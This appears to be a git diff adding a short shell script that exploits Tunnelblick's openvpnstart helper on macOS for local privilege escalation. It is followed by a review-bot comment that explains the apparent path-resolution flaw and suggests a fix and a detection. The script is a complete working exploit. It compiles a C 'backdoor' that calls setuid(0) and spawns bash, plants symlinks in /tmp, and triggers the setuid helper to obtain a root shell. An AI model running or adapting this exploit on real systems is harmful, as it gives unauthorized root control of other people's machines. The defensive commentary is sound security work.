Diffstat (limited to 'pwnnel-blicker-for-kids.sh')
-rwxr-xr-x | pwnnel-blicker-for-kids.sh | 28 |
1 files changed, 28 insertions, 0 deletions
diff --git a/pwnnel-blicker-for-kids.sh b/pwnnel-blicker-for-kids.sh
new file mode 100755
index 0000000..bc1a336
--- /dev/null
+++ b/pwnnel-blicker-for-kids.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+echo "[+] Making vulnerable directory."
+mkdir -pv /tmp/pwn/openvpn/openvpn-0
+
+echo "[+] Preparing payload."
+cat > /tmp/pwn/backdoor.c <<_EOF
+#include <unistd.h>
+#include <sys/stat.h>
+#include <stdio.h>
+
+int main()
+{
+ printf("[+] Cleaning up.\n");
+ system("rm -rfv /tmp/pwn");
+ printf("[+] Getting root.\n");
+ setuid(0);
+ setgid(0);
+ execl("/bin/bash", "bash", NULL);
+}
+_EOF
+gcc -o /tmp/pwn/root /tmp/pwn/backdoor.c
+
+echo "[+] Creating symlinks."
+ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn
+ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
+
+echo "[+] Triggering vulnerable program."
+exec /tmp/pwn/start OpenVPNInfo 0 |
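Review bot: The script carries no header comment naming the weakness it demonstrates or the Tunnelblick build it was checked against, so a reader has to infer both from the two `ln -s` lines. From those lines it appears (not confirmed by anything else in the diff) that `openvpnstart` locates the `openvpn` binary relative to the path it was invoked through rather than its resolved bundle location; a comment such as `# Demonstrates: openvpnstart resolves openvpn/openvpn-<n>/openvpn relative to its invocation path (tested on Tunnelblick <VERSION>)` would record that. For defenders this points to the fix (the helper should resolve its real path and verify the owner and mode of whatever it executes) and to a detection: `openvpnstart` being run through a path outside `/Applications/Tunnelblick.app`, or symlinks to it appearing in world-writable directories. Separately, the heredoc delimiter is unquoted, so the shell would expand any `$` or backtick in the embedded C; `<<'_EOF'` keeps the text literal.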